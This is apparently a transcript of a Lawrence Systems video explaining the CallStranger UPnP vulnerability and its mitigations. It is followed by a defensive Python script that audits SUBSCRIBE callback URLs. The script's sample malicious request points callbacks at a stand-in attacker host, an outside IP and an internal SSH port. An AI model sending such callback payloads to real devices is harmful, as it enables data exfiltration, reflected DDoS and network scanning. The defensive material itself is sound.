Tom here from Lawrence Systems, and we're going to talk about CallStranger, the terrible Universal Plug and Play problem that was just discovered. And terrible? I don't know, that's probably not a good enough adjective to describe the level of problems this is very likely to create, but I think if we get ahead of it, we're going to be able to mitigate it. Patches are available, but not everything is going to be patched, so we're going to talk about mitigation, not only patching. There are ways to block this, and I'll talk about ways you can protect yourself from it as best you can.

But first, if you'd like to learn more about me and my company, head over to LawrenceSystems.com. If you'd like to hire us for a short project, there's a Hire Us button right at the top. If you want to support this channel in other ways, there are affiliate links down below to get you deals and discounts on products and services we talk about on this channel, including a link to our Patreon if you'd like to become a Patreon supporter. We also have a swag store where you can get shirts and other items that are for sale, and what's available changes from time to time, so go ahead and check that out frequently. And finally, our forums: if you'd like to have a more in-depth discussion about this video, make suggestions for new videos, or just reach out, say hi and talk tech, our forums are a great place for that.

Alright, now back to the content. So we'll start right here with CallStranger.com: "Data exfiltration and reflected, amplified TCP DDoS and port scan via UPnP SUBSCRIBE callback." It's a triple threat: this one CVE, CVE-2020-12695, has three methodologies here. And they say billions of devices, and let me show you why, right here: Windows 10, probably all versions of Windows including servers (upnphost.dll), Xbox One. And then the list goes on from here: Asus RT-N11, Belkin WeMo, Cisco X100, Cisco X3500, D-Link WPS routers.
There's just a long list of these: HP DeskJet, Photosmart, OfficeJet, MV, NEC. Yeah. And this is the list as of June 9th, 2020. This is going to be updated, they said, as they learn of more devices.

So how do we figure out if a device is vulnerable? Any good security researcher releases their code, and this is all available on GitHub. You can go through it; it's all in Python. They have testing and, you know, they've really documented the whole schema, breaking down exactly how they did their testing. So you can go in here and dig into it. And what a mess. We'll play with the code later, maybe, but for right now you can see it's just kind of a mess overall.

Now there's a good write-up over here at Bleeping Computer on the same topic: "CallStranger UPnP bug allows data theft, DDoS attacks and LAN scans." Now, the way Universal Plug and Play works, and why they said LAN scans, and this is one of those problems, is that it's allowing something to grab the Universal Plug and Play ports and change them. So if you're not familiar with Universal Plug and Play, it is a security nightmare but a consumer convenience. What I mean by that is, in the olden days of the internet, in the earlier days of me playing games, it was always, you know, going through the details and port forwarding things in your router to try to get a game to work. Well, obviously the gaming industry and other industries related to that needed port forwarding, and all the different IoT devices are now taking advantage of this. UPnP was designed to just automatically and universally plug and play those ports. So you have an Xbox, for example, which is one of the vulnerable devices listed on here, and that Xbox would go talk to your router and say, "I would like you to open these ports so we can play this game." And the router would say, "No problem," the router firewall would open up the ports, and away we go.
Now you can see this is really convenient, because now I don't have to try to walk someone through it on the phone: "Oh, to play this particular game, here's the list of ports, here are all the settings, TCP this and UDP that and port this and port that." You know, that's really challenging, and Universal Plug and Play solved that. And for anyone who's doing security research, it's just a place to keep poking at.

Now, generally speaking, you're safe with UPnP, because the device needs to call out to play the game, so it does so by talking on the inside of your network to make that external connection. Now, what this vulnerability is, what happens, is that some of these devices have it facing WAN and LAN. Or some people, for reasons beyond my knowledge, because, well, it's not good security practice, I don't know how else to describe it, have put some of these devices with UPnP directly on networks, directly public facing on public IP addresses, essentially not behind firewalls. And some firewalls, some of the consumer ones, and some of the devices also have this problem where they're listening on the other side, they're listening on the WAN port. So this allows all kinds of pivoting in and out of the network. And if these devices themselves, the ones behind a firewall, also call out to a server and get that malformed information, they are going to perform what they referred to as a pivot. So they reached out, got bad information, pulled the callback, and then they can pivot within the network and essentially reflect, acting essentially like a cross-site scripting attack. And there are a lot of little flaws that could go wrong here.

Now, how do you protect yourself against it? Let's just scroll down here. We do have some mitigations and protections for it. "So despite patches being available for almost two months, updating all devices is unlikely to happen anytime soon, if ever," which is just the fact of things.
People don't update things, and if they don't auto-update, no one bothers to load new firmware on their devices. "It mainly depends on the vendors to implement the fix, and it takes time when dealing with protocol vulnerabilities. Furthermore, many devices will no longer be supported and are not able to receive updates." That's just common; these devices get out there and don't get updated unless there's extreme market pressure to do so.

But let's talk about fixes. So not all UPnP stacks are available; there are a couple that are not. So there's going to be that issue if you have a device, and it's not easy to tell, because this is a developer choice and you may not be aware of what the developer used to build the device you're using. But let's go down to the actual mitigations here.

"Disable unnecessary UPnP services, especially for internet-facing devices." Now, this is just a really important thing, and you may or may not be able to, depending on whether you have a consumer device that has that ability. "Check intranet and server networks to be sure UPnP devices (routers, IP cameras, printers, media gateways, etc.) are not allowing data exfiltration." That's going to be a little bit tricky, but I'm hoping that in most corporate networks that are properly configured, you shouldn't have UPnP devices in there able to open up ports. That's just definitely not a policy you should allow. "Go through network security logs and check if the vulnerability has been used by a threat actor." "Contact your ISP or DDoS protection vendor if there are solutions to block traffic generated by UPnP SUBSCRIBE and HTTP NOTIFY." That last one is where I think we're going to see a lot of the mitigations. So a quick search on Shodan showed that there are about 5.4 million devices out there listening for UPnP requests. That's where we're going to see a major issue here.
And many of these devices are probably owned by consumers, some of them owned by businesses that misconfigured them, or IT people in general who just did not configure them well. And we're probably going to see a bunch of mitigations coming directly from the ISPs. Not the first time this has happened. Years and years ago, when the internet started becoming more popular via cable modems and such, the first problem that was discovered rampantly was that, well, people were just plugging it right into their computer without a firewall and then publicly sharing their printers and publicly sharing their files. Whoops. Because years ago, that's just how things were, and no one really put a lot of thought into it, and Windows didn't even have a firewall by default back then. And the ISPs were quick to step in to the rescue from all the fun that was being had of people sending things to random people's printers that they could just find publicly exposed on the internet. Unfortunately we still have printers exposed to the internet, but you'll undoubtedly see more filtering going on to help mitigate this, because it causes a big burden of massive traffic going back and forth with a DDoS if all these are exposed and people send these malformed packets over UPnP and turn these into basically just ready-and-waiting bots to go do something and make a bunch of noise on the internet.

So my guess is we're going to see a massive amount of filtering, which is not necessarily a bad thing. That's how the ISPs solve the problem to some extent with the home users. The enterprise users, where they're just getting a pipe and no filtering at all, that's where I'm hoping... I don't know, of those 5.4 million, how many of them are enterprise versus home, but boy, at least some of them definitely are. So we'll see those devices hopefully just get knocked offline or something. Maybe someone will say, "Hey, maybe we should fix this," because they see some massive amount of traffic. I don't know.
The good news is it's not as... I mean, it's bad, but it's not as bad in terms of your home users, your consumers: your devices are not going to turn against you and take over your network. Your toaster that you decided needed internet is probably not going to be that much of a problem. Those should still be, if you want to follow good security, on a separate network. And also, and I use my laptop as an example, my laptop comes into hostile networks all the time, and this is running Linux, but you can do the same thing running Windows: turn the firewall on. Unless you really have a need, you don't necessarily need anything inbound on your computers to be listening. So if you are sharing a network with one of those devices, don't worry about it too much. If the Xbox is over there and it's on the same network, the likelihood of them turning the Xbox into an attack against your Windows 10 computer, Windows 10 laptop or Linux laptop is pretty low, because those types of devices are well updated. If you have some random kind of off-brand, as-cheap-as-you-could-find IoT device, well, there you may have a problem. Keep those on a separate network if they need internet. They're the most likely to be vulnerable to things like this, because with many of those devices, when it's a race to the bottom on price, one of the things quickly sacrificed is any type of firmware updates, proper vetting that they even used a more modern stack, or any security validation of the device ever. It was basically done by the lowest bidder: how cheap can we get this thing working? Don't worry about just using the same password on all of them. Those are always going to be flaws that are out there, and one of the dangers of putting all those random devices out there on the internet like that. So I'll leave links to the Bleeping Computer article, CallStranger.com, and the list of updates.
So if you have one of those devices on the vulnerable list, see if there's a firmware update. If you have a commercial firewall, and I'll throw this out there because I do a lot of videos on pfSense, by default pfSense and many other commercial firewalls do not have UPnP enabled at all; it is something you have to forcibly enable. Alternatively, if you had UPnP on previously because you wanted some game system to automatically talk to your router, but you decided maybe that's not the best idea, even though it's really convenient, you could also just look at manually mapping ports in there. That's another way to kind of mitigate this in case there are any further problems found with UPnP.

Those are my thoughts. Go ahead and read up on it here. I'll keep you updated if there's something more to it. But for now, we'll see how many of those 5.4 million devices get turned into some type of major botnet and cause chaos on the internet. It's a matter of time now that the research is out there, or it could have already been happening and this research is just highlighting it. We'll figure that out. It's always better to know and patch than to keep this all a secret. It's about getting the information out there. Thanks.

And thank you for making it to the end of the video. If you liked this video, please give it a thumbs up. If you'd like to see more content from the channel, hit the subscribe button and hit the bell icon if you'd like YouTube to notify you when new videos come out. If you'd like to hire us, head over to lawrencesystems.com, fill out our contact page and let us know what we can help you with and what projects you'd like us to work on together. If you want to carry on the discussion, head over to forums.lawrencesystems.com where we can carry on the discussion about this video, other videos, or other tech topics in general. Even suggestions for new videos are accepted right there on our forums, which are free.
Also, if you'd like to help the channel out in other ways, head over to our affiliate page. We have a lot of great tech offers for you. And once again, thanks for watching, and see you next time.
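The whole CallStranger problem, as the video describes it, is that a UPnP device sends NOTIFY traffic to whatever URL a SUBSCRIBE request puts in its Callback header. The check below is an added example by the editor, not code from the video, from CallStranger.com, or from the researchers' GitHub repository. It implements the validation a hardened device (or an IDS/proxy rule placed in front of one, which is the "block UPnP SUBSCRIBE / HTTP NOTIFY traffic" mitigation the video quotes) should apply: the subscriber must be on the LAN, every callback URL must be plain http to an IP literal on the LAN, and, as a stricter policy that is this example's own assumption rather than something the video states, the callback host must equal the subscriber's source address. The LAN range (192.168.1.0/24) and both sample requests are constructed for the example.

```python
"""
Audit UPnP (GENA) SUBSCRIBE requests for the CallStranger pattern.

A vulnerable UPnP device accepts any URL in the SUBSCRIBE Callback header
and later sends NOTIFY traffic to it, so an attacker can aim that traffic
at an outside host (exfiltration, reflected DDoS) or at hosts and ports
inside the LAN (scanning). The functions below apply the checks a
hardened device, or an IDS/proxy rule in front of one, should apply.
"""
import ipaddress
import re
from urllib.parse import urlsplit

# Assumption for this example: the LAN is 192.168.1.0/24.
ALLOWED_NETS = [ipaddress.ip_network("192.168.1.0/24")]

# A Callback header carries one or more URLs, each wrapped in <...>.
_CALLBACK_URL = re.compile(r"<([^>]+)>")


def parse_subscribe(raw):
    """Split a raw HTTP request into (method, target, headers).

    Header names are lower-cased because UPnP stacks send CALLBACK,
    Callback and callback interchangeably.
    """
    lines = raw.replace("\r\n", "\n").strip().split("\n")
    method, target = lines[0].split(" ", 2)[:2]
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def check_callback(url, src_ip, allowed_nets=ALLOWED_NETS, same_host=True):
    """Return (ok, reason) for one callback URL from subscriber src_ip."""
    parts = urlsplit(url)
    if parts.scheme != "http":
        return False, f"scheme {parts.scheme!r} not allowed"
    if not parts.hostname:
        return False, "callback URL has no host"
    try:
        addr = ipaddress.ip_address(parts.hostname)
    except ValueError:
        # A hostname would need a DNS lookup whose answer we cannot trust
        # (it could resolve to anything), so refuse it outright.
        return False, f"host {parts.hostname!r} is not an IP literal"
    if addr.is_loopback or addr.is_multicast or addr.is_unspecified:
        return False, f"{addr} is not a unicast subscriber address"
    if not any(addr in net for net in allowed_nets):
        return False, f"{addr} is outside the local network"
    if same_host and addr != ipaddress.ip_address(src_ip):
        # Stricter policy (an assumption of this example): the device only
        # notifies the host that actually subscribed, which shuts down the
        # LAN-scan vector entirely.
        return False, f"{addr} differs from subscriber address {src_ip}"
    return True, "ok"


def audit_subscribe(raw, src_ip, allowed_nets=ALLOWED_NETS, same_host=True):
    """Audit one SUBSCRIBE request; returns [(url, ok, reason), ...].

    src_ip is the address the TCP connection came from. An empty list
    means there was nothing to check (not a SUBSCRIBE, or a renewal that
    carries SID instead of Callback).
    """
    method, _, headers = parse_subscribe(raw)
    if method != "SUBSCRIBE" or "callback" not in headers:
        return []
    urls = _CALLBACK_URL.findall(headers["callback"])
    src = ipaddress.ip_address(src_ip)
    if not any(src in net for net in allowed_nets):
        # A SUBSCRIBE arriving from outside the LAN is the WAN-exposed
        # case in the video; refuse it before looking at any callback.
        return [(u, False, f"subscriber {src} is outside the local network")
                for u in urls]
    return [(u, *check_callback(u, src_ip, allowed_nets, same_host))
            for u in urls]


# Constructed sample requests (not real captures).
BENIGN = (
    "SUBSCRIBE /upnp/event/WANIPConn1 HTTP/1.1\r\n"
    "HOST: 192.168.1.1:49152\r\n"
    "CALLBACK: <http://192.168.1.20:5000/notify>\r\n"
    "NT: upnp:event\r\n"
    "TIMEOUT: Second-1800\r\n\r\n"
)
# Three callbacks: an Internet host (reflection / exfiltration target), an
# internal host on a port the subscriber has no business with (LAN scan),
# and a hostname the device would have to resolve.
MALICIOUS = (
    "SUBSCRIBE /upnp/event/WANIPConn1 HTTP/1.1\r\n"
    "HOST: 192.168.1.1:49152\r\n"
    "CALLBACK: <http://203.0.113.10:80/><http://192.168.1.50:22/>"
    "<http://attacker.example/collect>\r\n"
    "NT: upnp:event\r\n"
    "TIMEOUT: Second-1800\r\n\r\n"
)

if __name__ == "__main__":
    for name, raw in (("benign", BENIGN), ("malicious", MALICIOUS)):
        for url, ok, reason in audit_subscribe(raw, "192.168.1.20"):
            print(f"{name:9s} {'ALLOW' if ok else 'REJECT':6s} {url:40s} {reason}")
```

Run stand-alone it prints one ALLOW line for the benign request and three REJECT lines for the malicious one. Note what the check does not cover: a device that has already accepted a subscription will keep sending NOTIFYs until the timeout expires, so on an unpatched device the egress filtering the video expects from ISPs is still the only thing that stops traffic already in flight.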